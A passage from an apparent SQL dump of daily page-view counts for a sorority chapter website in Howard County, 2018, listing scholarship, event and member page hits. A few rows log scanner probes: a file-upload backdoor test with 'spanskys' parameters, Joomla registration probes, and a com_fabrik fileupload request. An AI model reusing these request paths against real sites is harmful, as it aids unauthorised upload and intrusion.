'/membership/','2018-03-25',3,576),('/','2018-03-26',62,6),('/scholarship/application/','2018-03-26',35,804),('/?wc-ajax=get_refreshed_fragments','2018-03-26',62,6),('/scholarship','2018-03-26',13,797),('/scholarship/','2018-03-26',53,797),('/scholarship/recommendation/','2018-03-26',23,1170),('/scholarship/lgzscholarshipreleaseform/','2018-03-26',5,1173),('/service/appa/','2018-03-26',7,781),('/membership/','2018-03-26',2,576),('/scholarship/application/?gf_token=becf3c42098e45e9b3ae133b114b2a00','2018-03-26',4,804),('/service/','2018-03-26',1,247),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-26',1,1258),('/scholarship/application/?gf_token=84ca0d98224f4f06ad36c81142d44c4c','2018-03-26',1,804),('/scholarship/application/?gf_token=4fff95e39de44786b7737e48eac16637','2018-03-26',2,804),('/scholarship/application/?gf_token=b4eca622c8f44c9f93c7da5d403d1dda','2018-03-26',1,804),('/scholarship/application/?gf_token=f59c0852f6e8420aa51aef021fccde55','2018-03-26',2,804),('/ts_teams/gloria-sanders/','2018-03-26',3,865),('/','2018-03-27',57,6),('/service/appa/','2018-03-27',6,781),('/?wc-ajax=get_refreshed_fragments','2018-03-27',37,6),('/membership/','2018-03-27',1,576),('/scholarship/','2018-03-27',23,797),('/scholarship/application/?gf_token=2b6ab36135d64e4d80cce89624f73feb','2018-03-27',5,804),('/scholarship/recommendation/','2018-03-27',12,1170),('/scholarship/application/','2018-03-27',10,804),('/scholarship','2018-03-27',6,797),('/service/youth/','2018-03-27',2,738),('/history/','2018-03-27',3,190),('/membership/trackback/','2018-03-27',1,576),('/event/howard-county-volunteer-year-reception/','2018-03-27',1,1268),('/service/zen/','2018-03-27',1,786),('/event/ms-walk-2017/','2018-03-27',1,1020),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-27',1,956),('/event/march-dimes-march-babies/','2018-03-27',1,1007),('/service/breakfastonthego/','2018-03-27',1,772),('/event/breakfast-on-the-go/','2018-03-27',1,493),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-27',1,1258),('/service/','2018-03-27',1,247),('/lgz-launches-new-college-preparation-workshops/','2018-03-27',1,1243),('/event/a-pretty-polished-affair/','2018-03-27',1,485),('/scholarship/application/?gf_token=f8acda80c8ec415d96c139ff113db338','2018-03-27',1,804),('/scholarship/lgzscholarshipreleaseform/','2018-03-27',3,1173),('/','2018-03-28',74,6),('/scholarship/','2018-03-28',27,797),('/?wc-ajax=get_refreshed_fragments','2018-03-28',36,6),('/scholarship/recommendation/','2018-03-28',14,1170),('/service/appa/','2018-03-28',5,781),('/scholarship/application/','2018-03-28',11,804),('/scholarship/application/?gf_token=c7dee752d76049af924f766211defa3b','2018-03-28',1,804),('/history/','2018-03-28',3,190),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-28',1,956),('/service/youth/','2018-03-28',1,738),('/service/zen/','2018-03-28',1,786),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-28',1,1258),('/service/','2018-03-28',1,247),('/event/howard-county-volunteer-year-reception/','2018-03-28',1,1268),('/event/march-dimes-march-babies/','2018-03-28',1,1007),('/event/breakfast-on-the-go/','2018-03-28',1,493),('/event/ms-walk-2017/','2018-03-28',1,1020),('/ts_teams/josephine-gross/','2018-03-28',1,1232),('/scholarship/application/?gf_token=f59c0852f6e8420aa51aef021fccde55','2018-03-28',1,804),('/scholarship','2018-03-28',1,797),('/scholarship/lgzscholarshipreleaseform/','2018-03-28',1,1173),('/scholarship/application/?gf_token=21bff35969ab4ac4b136426e7e270a14','2018-03-28',2,804),('/','2018-03-29',55,6),('/?wc-ajax=get_refreshed_fragments','2018-03-29',45,6),('/service/appa/','2018-03-29',6,781),('/scholarship/application/?gf_token=2cb6161c37884f548e1355993249cdff','2018-03-29',1,804),('/scholarship/application/','2018-03-29',20,804),('/scholarship','2018-03-29',5,797),('/scholarship/','2018-03-29',27,797),('/scholarship/lgzscholarshipreleaseform/','2018-03-29',5,1173),('/scholarship/recommendation/','2018-03-29',19,1170),('/scholarship/application/?gf_token=adde7e3c480547b9abed971e10974209','2018-03-29',1,804),('/history/','2018-03-29',4,190),('/service/breakfastonthego/','2018-03-29',3,772),('/membership/','2018-03-29',2,576),('/?instance=1','2018-03-29',3,6),('/event/breakfast-on-the-go/','2018-03-29',2,493),('/service/','2018-03-29',2,247),('/event/howard-county-volunteer-year-reception/','2018-03-29',2,1268),('/service/zen/','2018-03-29',2,786),('/lgz-celebrates-35-years-service-howard-county-md/','2018-03-29',2,956),('/service/youth/','2018-03-29',2,738),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-03-29',2,1258),('/lgz-launches-new-college-preparation-workshops/','2018-03-29',2,1243),('/event/a-pretty-polished-affair/','2018-03-29',2,485),('/event/march-dimes-march-babies/','2018-03-29',2,1007),('/event/ms-walk-2017/','2018-03-29',2,1020),('/scholarship/application/?gf_token=4fff95e39de44786b7737e48eac16637','2018-03-29',1,804),('/scholarship/application/?gf_token=d1d554404c5b4311917b24cdcbc07a33','2018-03-29',1,804),('/','2018-03-30',66,6),('/service/appa/','2018-03-30',7,781),('/?wc-ajax=get_refreshed_fragments','2018-03-30',54,6),('/scholarship/recommendation/','2018-03-30',10,1170),('/scholarship/','2018-03-30',31,797),('/scholarship','2018-03-30',1,797),('/scholarship/application/','2018-03-30',27,804),('/ts_teams/jeaneathia-yerby-crowder/','2018-03-30',1,828),('/history/','2018-03-30',4,190),('/event/howard-county-volunteer-year-reception/','2018-03-30',1,1268),('/scholarship/application/?gf_token=049ef8d997014b4eb180a0f595d2b7c2','2018-03-30',4,804),('/scholarship/application/?gf_token=2cb6161c37884f548e1355993249cdff','2018-03-30',3,804),('/scholarship/lgzscholarshipreleaseform/','2018-03-30',8,1173),('/event/ms-walk-2017/','2018-03-30',1,1020),('/scholarship/application/?gf_token=f8acda80c8ec415d96c139ff113db338','2018-03-30',1,804),('/scholarship/application/','2018-03-31',37,804),('/?wc-ajax=get_refreshed_fragments','2018-03-31',49,6),('/scholarship/','2018-03-31',29,797),('/','2018-03-31',46,6),('/service/','2018-03-31',1,247),('/scholarship/lgzscholarshipreleaseform/','2018-03-31',12,1173),('/event/ms-walk-2017/','2018-03-31',1,1020),('/service/appa/','2018-03-31',5,781),('/scholarship/application/?gf_token=4247d8c0b73543d881c21de71e8ea460','2018-03-31',2,804),('/scholarship/application/?gf_token=2b6ab36135d64e4d80cce89624f73feb','2018-03-31',3,804),('/scholarship','2018-03-31',3,797),('/scholarship/application/?gf_token=41f72cf806424bab8a2801aa55dc0054','2018-03-31',6,804),('/scholarship/recommendation/','2018-03-31',4,1170),('/scholarship/application/?gf_token=9d01e4ed33f14e329321c03f331478e1','2018-03-31',1,804),('/scholarship/application/?gf_token=46164e697789430b912bcdeb98387e81','2018-03-31',3,804),('/history/','2018-03-31',1,190),('/ts_teams/cherice-daniel-2/','2018-03-31',2,825),('/?wc-ajax=get_refreshed_fragments','2018-04-01',13,6),('/','2018-04-01',41,6),('/service/appa/','2018-04-01',10,781),('/history/','2018-04-01',6,190),('/scholarship/','2018-04-01',7,797),('/service/','2018-04-01',4,247),('/service/breakfastonthego/','2018-04-01',4,772),('/service/youth/','2018-04-01',4,738),('/service/zen/','2018-04-01',4,786),('/event/a-pretty-polished-affair/','2018-04-01',4,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-01',4,1258),('/event/howard-county-volunteer-year-reception/','2018-04-01',4,1268),('/event/ms-walk-2017/','2018-04-01',4,1020),('/event/breakfast-on-the-go/','2018-04-01',4,493),('/event/march-dimes-march-babies/','2018-04-01',4,1007),('/lgz-launches-new-college-preparation-workshops/','2018-04-01',4,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-01',4,956),('/scholarship/soror-conway1/','2018-04-01',4,1179),('/scholarship/lgzscholarshipreleaseform/','2018-04-01',5,1173),('/scholarship/application/','2018-04-01',3,804),('/scholarship/recommendation/','2018-04-01',2,1170),('/ts_teams/josephine-gross/','2018-04-01',4,1232),('/ts_teams/oretta-timmons/','2018-04-01',4,1230),('/ts_teams/yasmine-allen/','2018-04-01',4,1228),('/lgz-launches-new-college-preparation-workshops/feed/','2018-04-01',1,1243),('/?p=956','2018-04-01',1,956),('/ts_teams/nicholas-claud/','2018-04-01',2,1220),('/ts_teams/journey-mcmillan/','2018-04-01',2,1222),('/ts_teams/jelani-dula/','2018-04-01',2,1226),('/?p=1243','2018-04-01',1,1243),('/ts_teams/christopher-flowers/','2018-04-01',2,1224),('/cause/marchofdimes-2/','2018-04-01',2,90),('/cause/march-of-dimes/','2018-04-01',2,1023),('/ts_teams/constance-kinder/','2018-04-01',1,822),('/ts_teams/jeaneathia-yerby-crowder/','2018-04-01',1,828),('/ts_teams/kathy-j-barrett/','2018-04-01',1,819),('/cause/scholarship/','2018-04-01',1,59),('/ts_teams/christy-lewis/','2018-04-01',1,818),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-04-01',1,689),('/ts_teams/tracy-irvin/','2018-04-01',1,815),('/ts_teams/tamika-r-daniels/','2018-04-01',1,814),('/ts_teams/crystal-whitaker/','2018-04-01',1,816),('/ts_teams/dawn-j-kemp/','2018-04-01',1,817),('/ts_teams/cherice-daniel-2/','2018-04-01',1,825),('/ts_slider/567/','2018-04-01',1,567),('/ts_teams/lillet-williams/','2018-04-01',1,823),('/ts_teams/lillet-williams-2/','2018-04-01',1,824),('/ts_teams/shanee-satchell/','2018-04-01',1,820),('/','2018-04-02',67,6),('/scholarship/','2018-04-02',7,797),('/service/appa/','2018-04-02',7,781),('/?wc-ajax=get_refreshed_fragments','2018-04-02',15,6),('/scholarship/recommendation/','2018-04-02',2,1170),('/index.php?spanskys_filename=1234.txt&spanskys_filecontent=1234.txt&xx_loads=True&spanskys_loads=True&upfiles=True&filename=1234.txt&filecontent=1234.txt','2018-04-02',1,6),('/?spanskys_filename=1234.txt&spanskys_filecontent=1234.txt&xx_loads=True&spanskys_loads=True&upfiles=True&filename=1234.txt&filecontent=1234.txt','2018-04-02',1,6),('/scholarship/application/?gf_token=46164e697789430b912bcdeb98387e81','2018-04-02',1,804),('/lgz-launches-new-college-preparation-workshops/','2018-04-02',1,1243),('/service/','2018-04-02',4,247),('/history/','2018-04-02',3,190),('/service/breakfastonthego/','2018-04-02',3,772),('/service/youth/','2018-04-02',3,738),('/service/zen/','2018-04-02',1,786),('/event/a-pretty-polished-affair/','2018-04-02',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-02',1,1258),('/scholarship/application/','2018-04-02',2,804),('/ts_teams/josephine-gross/','2018-04-02',2,1232),('/ts_teams/oretta-timmons/','2018-04-02',2,1230),('/ts_teams/yasmine-allen/','2018-04-02',2,1228),('/ts_teams/jelani-dula/','2018-04-02',2,1226),('/ts_teams/christopher-flowers/','2018-04-02',2,1224),('/ts_teams/journey-mcmillan/','2018-04-02',2,1222),('/ts_teams/nicholas-claud/','2018-04-02',2,1220),('/index.php?option=com_user&task=register','2018-04-02',2,6),('/?option=com_user&task=register','2018-04-02',1,6),('/history/','2018-04-03',4,190),('/?wc-ajax=get_refreshed_fragments','2018-04-03',9,6),('/','2018-04-03',55,6),('/scholarship/recommendation/','2018-04-03',2,1170),('/scholarship/','2018-04-03',18,797),('/service/breakfastonthego/','2018-04-03',1,772),('/','2018-04-04',60,6),('/?wc-ajax=get_refreshed_fragments','2018-04-04',21,6),('/event/a-pretty-polished-affair/','2018-04-04',2,485),('/service/appa/','2018-04-04',5,781),('/service/','2018-04-04',1,247),('/service/breakfastonthego/','2018-04-04',1,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-04',1,956),('/service/zen/','2018-04-04',1,786),('/service/youth/','2018-04-04',1,738),('/event/ms-walk-2017/','2018-04-04',1,1020),('/event/breakfast-on-the-go/','2018-04-04',2,493),('/history/','2018-04-04',1,190),('/lgz-launches-new-college-preparation-workshops/','2018-04-04',1,1243),('/event/march-dimes-march-babies/','2018-04-04',1,1007),('/event/howard-county-volunteer-year-reception/','2018-04-04',1,1268),('/scholarship/','2018-04-04',10,797),('/scholarship/application/','2018-04-04',3,804),('/scholarship','2018-04-04',1,797),('/ts_teams/ava-lawson/','2018-04-04',2,872),('/','2018-04-05',65,6),('/?wc-ajax=get_refreshed_fragments','2018-04-05',18,6),('/service/appa/','2018-04-05',6,781),('/scholarship/','2018-04-05',4,797),('/scholarship/recommendation/','2018-04-05',5,1170),('/history/','2018-04-05',5,190),('/scholarship/lgzscholarshipreleaseform/','2018-04-05',1,1173),('/','2018-04-06',89,6),('/?wc-ajax=get_refreshed_fragments','2018-04-06',21,6),('/index.php?option=com_user&view=register','2018-04-06',1,6),('/?option=com_user&view=register','2018-04-06',3,6),('/index.php?option=com_users&view=registration','2018-04-06',1,6),('/?option=com_users&view=registration','2018-04-06',3,6),('/index.php?option=com_comprofiler&task=registers','2018-04-06',1,6),('/?option=com_comprofiler&task=registers','2018-04-06',1,6),('/service/appa/','2018-04-06',7,781),('/history/','2018-04-06',4,190),('/service/','2018-04-06',7,247),('/scholarship/','2018-04-06',7,797),('/service','2018-04-06',1,247),('/service/zen/','2018-04-06',1,786),('/scholarship/recommendation/','2018-04-06',1,1170),('/event/ms-walk-2017/','2018-04-06',1,1020),('/event/breakfast-on-the-go/','2018-04-06',2,493),('/event/a-pretty-polished-affair/','2018-04-06',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-06',1,1258),('/event/march-dimes-march-babies/','2018-04-06',2,1007),('/ts_teams/w-ruth-conway/','2018-04-07',1,881),('/','2018-04-07',58,6),('/history/','2018-04-07',3,190),('/?wc-ajax=get_refreshed_fragments','2018-04-07',12,6),('/service/appa/','2018-04-07',5,781),('/scholarship/','2018-04-07',1,797),('/scholarship/application/','2018-04-07',2,804),('/membership/','2018-04-07',2,576),('/','2018-04-08',78,6),('/ts_teams/quiyatta-gardner/','2018-04-08',1,876),('/?wc-ajax=get_refreshed_fragments','2018-04-08',23,6),('/history/','2018-04-08',15,190),('/history','2018-04-08',3,190),('/service/appa/','2018-04-08',6,781),('/scholarship/','2018-04-08',3,797),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-04-08',3,689),('/ts_teams/linda-price/','2018-04-08',1,867),('/scholarship/application/','2018-04-08',1,804),('/','2018-04-09',90,6),('/?wc-ajax=get_refreshed_fragments','2018-04-09',18,6),('/service/appa/','2018-04-09',8,781),('/history/','2018-04-09',4,190),('/scholarship/','2018-04-09',5,797),('/service/','2018-04-09',1,247),('/service/breakfastonthego/','2018-04-09',2,772),('/service/youth/','2018-04-09',1,738),('/service/zen/','2018-04-09',1,786),('/event/a-pretty-polished-affair/','2018-04-09',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-09',1,1258),('/event/howard-county-volunteer-year-reception/','2018-04-09',1,1268),('/event/ms-walk-2017/','2018-04-09',2,1020),('/event/breakfast-on-the-go/','2018-04-09',1,493),('/event/march-dimes-march-babies/','2018-04-09',2,1007),('/lgz-launches-new-college-preparation-workshops/','2018-04-09',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-09',1,956),('/scholarship/soror-conway1/','2018-04-09',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-04-09',1,1173),('/ts_teams/josephine-gross/','2018-04-09',1,1232),('/ts_teams/oretta-timmons/','2018-04-09',1,1230),('/ts_teams/yasmine-allen/','2018-04-09',1,1228),('/ts_teams/jelani-dula/','2018-04-09',1,1226),('/ts_teams/christopher-flowers/','2018-04-09',1,1224),('/ts_teams/journey-mcmillan/','2018-04-09',1,1222),('/ts_teams/nicholas-claud/','2018-04-09',1,1220),('/','2018-04-10',73,6),('/?wc-ajax=get_refreshed_fragments','2018-04-10',22,6),('/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload','2018-04-10',1,6),('/download/constitution-by-laws/','2018-04-10',2,989),('/scholarship/','2018-04-10',3,797),('/history/','2018-04-10',8,190),('/history','2018-04-10',3,190),('/service/appa/','2018-04-10',5,781),('/scholarship/application/','2018-04-10',1,804),('/','2018-04-11',88,6),('/?wc-ajax=get_refreshed_fragments','2018-04-11',27,6),('/history/','2018-04-11',6,190),('/scholarship/','2018-04-11',3,797),('/service/','2018-04-11',1,247),('/service/appa/','2018-04-11',4,781),('/service/breakfastonthego/','2018-04-11',1,772),('/service/youth/','2018-04-11',1,738),('/service/zen/','2018-04-11',1,786),('/event/a-pretty-polished-affair/','2018-04-11',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-11',2,1258),('/event/howard-county-volunteer-year-reception/','2018-04-11',5,1268),('/event/ms-walk-2017/','2018-04-11',1,1020),('/event/breakfast-on-the-go/','2018-04-11',1,493),('/event/march-dimes-march-babies/','2018-04-11',2,1007),('/lgz-celebrates-35-years-service-howard-county-md','2018-04-11',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-11',2,956),('/event/howard-county-volunteer-year-reception','2018-04-11',1,1268),('/scholarship','2018-04-11',1,797),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-04-11',1,1258),('/membership/trackback/','2018-04-11',1,576),('/','2018-04-12',55,6),('/?wc-ajax=get_refreshed_fragments','2018-04-12',15,6),('/service/appa/','2018-04-12',5,781),('/scholarship/lgzscholarshipreleaseform/','2018-04-12',1,1173),('/index.php','2018-04-12',1,6),('/ts_teams/rosee-ragin/','2018-04-12',2,866),('/history/','2018-04-12',4,190),('/event/howard-county-volunteer-year-reception/','2018-04-12',2,1268),('/scholarship/','2018-04-12',5,797),('/','2018-04-13',89,6),('/service/appa/','2018-04-13',5,781),('/?wc-ajax=get_refreshed_fragments','2018-04-13',16,6),('/membership/','2018-04-13',1,576),('/event/howard-county-volunteer-year-reception/','2018-04-13',2,1268),('/history/','2018-04-13',4,190),('/scholarship/recommendation/','2018-04-13',1,1170),('/scholarship/','2018-04-13',5,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-13',4,956),('/event/a-pretty-polished-affair/','2018-04-13',2,485),('/event/breakfast-on-the-go/','2018-04-13',1,493),('/event/march-dimes-march-babies/','2018-04-13',2,1007),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-13',1,1258),('/event/ms-walk-2017/','2018-04-13',1,1020),('/lgz-launches-new-college-preparation-workshops/','2018-04-13',1,1243),('/service/','2018-04-13',2,247),('/service/breakfastonthego/','2018-04-13',1,772),('/service/zen/','2018-04-13',1,786),('/service/youth/','2018-04-13',1,738),('/','2018-04-14',44,6),('/service/appa/','2018-04-14',4,781),('/?wc-ajax=get_refreshed_fragments','2018-04-14',7,6),('/ts_teams/kristin-clark/','2018-04-14',1,883),('/download/constitution-by-laws/','2018-04-14',1,989),('/history/','2018-04-14',2,190),('/ts_teams/crystal-whitaker/','2018-04-14',1,816),('/','2018-04-15',67,6),('/service/appa/','2018-04-15',3,781),('/?wc-ajax=get_refreshed_fragments','2018-04-15',9,6),('/ts_teams/christy-lewis/','2018-04-15',1,818),('/scholarship/','2018-04-15',2,797),('/service/youth/','2018-04-15',1,738),('/event/howard-county-volunteer-year-reception/','2018-04-15',1,1268),('/','2018-04-16',77,6),('/service/appa/','2018-04-16',3,781),('/?wc-ajax=get_refreshed_fragments','2018-04-16',16,6),('/history/','2018-04-16',4,190),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2018-04-16',1,689),('/lgz-launches-new-college-preparation-workshops/','2018-04-16',1,1243),('/service/zen/','2018-04-16',3,786),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-16',1,956),('/scholarship/','2018-04-16',7,797),('/event/a-pretty-polished-affair/','2018-04-16',1,485),('/scholarship/lgzscholarshipreleaseform/','2018-04-16',1,1173),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-16',1,1258),('/ts_teams/crystal-whitaker/','2018-04-16',1,816),('/','2018-04-17',56,6),('/service/appa/','2018-04-17',8,781),('/?wc-ajax=get_refreshed_fragments','2018-04-17',16,6),('/scholarship','2018-04-17',2,797),('/scholarship/','2018-04-17',6,797),('/history/','2018-04-17',3,190),('/event/ms-walk-2017/','2018-04-17',1,1020),('/','2018-04-18',72,6),('/service/appa/','2018-04-18',4,781),('/?wc-ajax=get_refreshed_fragments','2018-04-18',13,6),('/history/','2018-04-18',5,190),('/service/','2018-04-18',3,247),('/service/breakfastonthego/','2018-04-18',1,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-18',1,956),('/service/zen/','2018-04-18',1,786),('/service/youth/','2018-04-18',1,738),('/event/ms-walk-2017/','2018-04-18',1,1020),('/event/breakfast-on-the-go/','2018-04-18',1,493),('/event/march-dimes-march-babies/','2018-04-18',1,1007),('/scholarship/','2018-04-18',2,797),('/','2018-04-19',69,6),('/service/appa/','2018-04-19',6,781),('/?wc-ajax=get_refreshed_fragments','2018-04-19',13,6),('/history/','2018-04-19',2,190),('/scholarship/','2018-04-19',3,797),('/service/','2018-04-19',2,247),('/service/breakfastonthego/','2018-04-19',1,772),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-19',1,1258),('/event/a-pretty-polished-affair/','2018-04-19',1,485),('/service/youth/','2018-04-19',1,738),('/service/zen/','2018-04-19',1,786),('/event/howard-county-volunteer-year-reception/','2018-04-19',2,1268),('/event/breakfast-on-the-go/','2018-04-19',1,493),('/lgz-launches-new-college-preparation-workshops/','2018-04-19',1,1243),('/event/march-dimes-march-babies/','2018-04-19',2,1007),('/event/ms-walk-2017/','2018-04-19',1,1020),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-19',1,956),('/','2018-04-20',42,6),('/?wc-ajax=get_refreshed_fragments','2018-04-20',10,6),('/service/appa/','2018-04-20',8,781),('/ts_teams/christy-lewis/','2018-04-20',2,818),('/history/','2018-04-20',3,190),('/','2018-04-21',61,6),('/?wc-ajax=get_refreshed_fragments','2018-04-21',10,6),('/service/appa/','2018-04-21',5,781),('/history/','2018-04-21',2,190),('/scholarship/','2018-04-21',2,797),('/service/','2018-04-21',1,247),('/service/zen/','2018-04-21',1,786),('/service/breakfastonthego/','2018-04-21',1,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-21',1,956),('/event/a-pretty-polished-affair/','2018-04-21',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-21',1,1258),('/event/breakfast-on-the-go/','2018-04-21',1,493),('/event/ms-walk-2017/','2018-04-21',1,1020),('/lgz-launches-new-college-preparation-workshops/','2018-04-21',1,1243),('/event/howard-county-volunteer-year-reception/','2018-04-21',1,1268),('/event/march-dimes-march-babies/','2018-04-21',1,1007),('/service/youth/','2018-04-21',1,738),('/','2018-04-22',99,6),('/service/appa/','2018-04-22',3,781),('/?wc-ajax=get_refreshed_fragments','2018-04-22',9,6),('/history/','2018-04-22',1,190),('/lgz-launches-new-college-preparation-workshops/','2018-04-22',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-22',1,956),('/ts_teams/ebony-cogdell/','2018-04-22',1,882),('/scholarship/','2018-04-22',2,797),('/service/','2018-04-22',1,247),('/service/breakfastonthego/','2018-04-22',1,772),('/','2018-04-23',83,6),('/event/ms-walk-2017/','2018-04-23',2,1020),('/history/','2018-04-23',2,190),('/scholarship/','2018-04-23',6,797),('/service/','2018-04-23',2,247),('/service/appa/','2018-04-23',5,781),('/service/breakfastonthego/','2018-04-23',2,772),('/service/youth/','2018-04-23',3,738),('/service/zen/','2018-04-23',2,786),('/event/a-pretty-polished-affair/','2018-04-23',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-23',2,1258),('/event/howard-county-volunteer-year-reception/','2018-04-23',1,1268),('/event/breakfast-on-the-go/','2018-04-23',2,493),('/event/march-dimes-march-babies/','2018-04-23',1,1007),('/lgz-launches-new-college-preparation-workshops/','2018-04-23',1,1243),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-23',1,956),('/scholarship/soror-conway1/','2018-04-23',1,1179),('/scholarship/lgzscholarshipreleaseform/','2018-04-23',2,1173),('/ts_teams/josephine-gross/','2018-04-23',1,1232),('/ts_teams/oretta-timmons/','2018-04-23',1,1230),('/ts_teams/yasmine-allen/','2018-04-23',1,1228),('/ts_teams/jelani-dula/','2018-04-23',1,1226),('/ts_teams/christopher-flowers/','2018-04-23',1,1224),('/ts_teams/journey-mcmillan/','2018-04-23',1,1222),('/ts_teams/nicholas-claud/','2018-04-23',1,1220),('/?wc-ajax=get_refreshed_fragments','2018-04-23',11,6),('/download/aarc/','2018-04-23',1,991),('/scholarship/application/','2018-04-23',2,804),('/?wc-ajax=get_refreshed_fragments','2018-04-24',15,6),('/','2018-04-24',54,6),('/service/appa/','2018-04-24',9,781),('/history/','2018-04-24',4,190),('/service/','2018-04-24',3,247),('/service/breakfastonthego/','2018-04-24',3,772),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-24',3,956),('/service/zen/','2018-04-24',3,786),('/event/breakfast-on-the-go/','2018-04-24',3,493),('/scholarship/','2018-04-24',8,797),('/service/youth/','2018-04-24',2,738),('/event/a-pretty-polished-affair/','2018-04-24',2,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-24',2,1258),('/event/howard-county-volunteer-year-reception/','2018-04-24',2,1268),('/event/ms-walk-2017/','2018-04-24',2,1020),('/event/march-dimes-march-babies/','2018-04-24',2,1007),('/lgz-launches-new-college-preparation-workshops/','2018-04-24',2,1243),('/cause/scholarship/','2018-04-24',1,59),('/','2018-04-25',96,6),('/service/appa/','2018-04-25',7,781),('/?wc-ajax=get_refreshed_fragments','2018-04-25',18,6),('/scholarship/','2018-04-25',6,797),('/scholarship/application/','2018-04-25',1,804),('/ts_teams/linda-price/','2018-04-25',1,867),('/event/howard-county-volunteer-year-reception/','2018-04-25',1,1268),('/scholarship','2018-04-25',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-25',1,956),('/service/','2018-04-25',2,247),('/service/breakfastonthego/','2018-04-25',1,772),('/event/breakfast-on-the-go/','2018-04-25',1,493),('/event/march-dimes-march-babies/','2018-04-25',1,1007),('/history/','2018-04-25',3,190),('/','2018-04-26',77,6),('/event/howard-county-volunteer-year-reception','2018-04-26',1,1268),('/event/howard-county-volunteer-year-reception/','2018-04-26',1,1268),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications','2018-04-26',1,1258),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-26',9,1258),('/scholarship','2018-04-26',1,797),('/scholarship/','2018-04-26',2,797),('/lgz-celebrates-35-years-service-howard-county-md','2018-04-26',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-26',1,956),('/?wc-ajax=get_refreshed_fragments','2018-04-26',9,6),('/service/appa/','2018-04-26',3,781),('/history/','2018-04-26',2,190),('/','2018-04-27',65,6),('/?wc-ajax=get_refreshed_fragments','2018-04-27',19,6),('/service/appa/','2018-04-27',8,781),('/service/youth/','2018-04-27',2,738),('/history/','2018-04-27',5,190),('/scholarship/','2018-04-27',4,797),('/service/','2018-04-27',1,247),('/service/breakfastonthego/','2018-04-27',1,772),('/service/zen/','2018-04-27',1,786),('/event/a-pretty-polished-affair/','2018-04-27',1,485),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-27',1,1258),('/event/march-dimes-march-babies/','2018-04-27',1,1007),('/lgz-launches-new-college-preparation-workshops/','2018-04-27',1,1243),('/event/ms-walk-2017/','2018-04-27',1,1020),('/event/howard-county-volunteer-year-reception/','2018-04-27',2,1268),('/event/breakfast-on-the-go/','2018-04-27',1,493),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-27',1,956),('/scholarship/recommendation/','2018-04-27',1,1170),('/cause/scholarship/','2018-04-27',1,59),('/','2018-04-28',53,6),('/service/appa/','2018-04-28',6,781),('/?wc-ajax=get_refreshed_fragments','2018-04-28',7,6),('/download/constitution-by-laws/','2018-04-29',2,989),('/scholarship/','2018-04-29',2,797),('/','2018-04-29',43,6),('/?wc-ajax=get_refreshed_fragments','2018-04-29',12,6),('/history/','2018-04-29',2,190),('/service/appa/','2018-04-29',8,781),('/service/','2018-04-29',1,247),('/event/breakfast-on-the-go/','2018-04-29',1,493),('/ts_teams/lillet-williams-2/','2018-04-29',2,824),('/','2018-04-30',63,6),('/service/','2018-04-30',2,247),('/service/zen/','2018-04-30',1,786),('/scholarship/','2018-04-30',4,797),('/history/','2018-04-30',6,190),('/service/appa/','2018-04-30',5,781),('/service/breakfastonthego/','2018-04-30',3,772),('/event/a-pretty-polished-affair/','2018-04-30',1,485),('/service/youth/','2018-04-30',3,738),('/event/nuts-bolts-2-organizing-writing-college-scholarship-applications/','2018-04-30',1,1258),('/event/howard-county-volunteer-year-reception/','2018-04-30',2,1268),('/event/breakfast-on-the-go/','2018-04-30',1,493),('/event/ms-walk-2017/','2018-04-30',1,1020),('/lgz-launches-new-college-preparation-workshops/','2018-04-30',1,1243),('/event/march-dimes-march-babies/','2018-04-30',1,1007),('/lgz-celebrates-35-years-service-howard-county-md/','2018-04-30',1,956),('/?wc-ajax=get_refreshed_fragments','2018-04-30',11,6),('/','2018-05-01',50,6),('/history/','2018-05-01',2,190),('/service/appa/','2018-05-01',3,781),('/?wc-ajax=get_refreshed_fragments','2018-05-01',8,6),('/scholarship/','2018-05-01',3,797),('/event/ms-walk-2017/','2018-05-01',1,1020),('/ts_teams/ebony-cogdell/','2018-05-02',1,882),('/?wc-ajax=get_refreshed_fragments','2018-05-02',15,6),('/','2018-05-02',62,6),(